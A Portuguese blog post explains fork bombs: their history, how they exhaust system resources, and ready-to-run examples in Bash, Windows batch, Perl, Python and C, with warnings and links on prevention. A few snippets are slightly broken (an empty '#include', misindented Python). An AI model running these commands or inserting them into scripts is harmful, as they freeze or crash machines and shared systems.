O que é uma fork bomb?

Neste post, vou mostrar como funcionam as fork bombs, como fazer uma e como se prevenir deste tipo de código malicioso.
Além das diversas definições, sempre há uma história por ser contada e é por onde vou começar.
Ao final do texto, há alguns links para outros sites onde o assunto também é abordado, caso você queira se aprofundar mais no assunto.
Pernalonga e Elmer Fudd
Se o seu interesse é prevenção, leia Como prevenir a execução de uma fork bomb no seu sistema.

Qual a definição de fork bomb?

Uma definição simples para fork bomb é a de que se trata de um código que tenha a função e a capacidade de se replicar indefinidamente.
Vírus e vermes não valem para esta definição.
À medida em que o código vai auto replicando, consome cada vez mais recursos de memória, de processamento etc.
Como os recursos do sistema não são inesgotáveis, o resultado é que ele entra em colapso.
Há relatos de que códigos deste tipo foram executados por estudantes, na Universidade de Washington, em um Burroughs 5500, em 1969 — o programa fazia 2 cópias de si mesmo, a cada vez em que era executado até que o sistema fosse derrubado.
A esta rápida reprodução do código deve-se o apelido de “trabalho de coelho” (rabbit job) ou wabbit, em alusão ao personagem da Looney Tunes, Elmer Fudd, que trocava o R pelo L (veja link ao final do texto) — a piada só tem graça em inglês.

Como criar uma fork bomb no Ubuntu

Você não precisa ser super usuário para criar e rodar uma fork bomb na maioria das vezes. Normalmente, cabe ao administrador do sistema regular como cada usuário irá usar os recursos.
error iconO código abaixo é um dos mais conhecidos e torna o seu sistema cada vez mais lento, a ponto de parar de responder completamente.
Este código e todos os outros, neste artigo, podem quebrar o seu sistema. Seja responsável!

:(){ :|: & };:

O seu funcionamento é o seguinte:

  • :() — cria/define uma função chamada :
  • {:|: &} — roda a função : e direciona sua saída para a função : e a executa nos bastidores
  • ; — este caractere funciona como separador, na linha de comandos. Equivale a && e permite iniciar uma outra instrução
  • : — executa a função definida no início

É possível desarmar esta bomba com o comando kill, no Linux — mas você provavelmente vai precisar ser muito rápido para fazer isto antes que seu sistema morra por inanição de recursos.
Uma outra forma, mais compreensível, de obter o mesmo resultado nefasto é assim:

bomba()
 {
bomba | bomba &
 }; bomba

No código, acima, fica mais claro ver a função executar-se a si mesma.
Se você gostaria de ver um exemplo não malicioso de execução de uma fork bomb, o código abaixo é seguro para você experimentar:

fork_bomb(){ echo "FORK BOMB"; };
fork_bomb

No terminal, ele pode ser interrompido com Ctrl+C.

Como criar uma fork bomb no Windows

Você pode criar um arquivo .bat, com o seguinte conteúdo:

:bomba
start %0
goto bomba

Ou rodar este código:

%0|%0

As fork bombs funcionam como esquemas de negação de serviço (denial of service) — elas devoram os recursos do sistema.

Como criar uma fork bomb em Perl, Python e em C

Exemplo em Perl:

perl -e "fork while fork" &

Em Python:

import os
  while(1):
      os.fork()

E, por último, uma fork bomb em linguagem C:

#include
int main()
 {
   while(1)
      fork();
 }

Referências

Como se prevenir de uma fork bomb.
Comandos fatais para Linux.
Cyberciti — Understanding fork bomb.
Linuxconfig — How to crash your system with a fork bomb.
Hortelino Troca-Letras (Elmer Fudd) — http://pt.wikipedia.org/wiki/Elmer_Fudd.
The hackers jargon — http://catb.org/~esr/jargon/html/W/wabbit.html.

Publicado por

Elias Praciano

Autor de tecnologia (livre, de preferência), apaixonado por programação e astronomia.
Fã de séries, como “Rick and Morty” e “BoJack Horseman”.
Me siga no Twitter e vamos trocar ideias!

7 thoughts on “O que é uma fork bomb?”

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *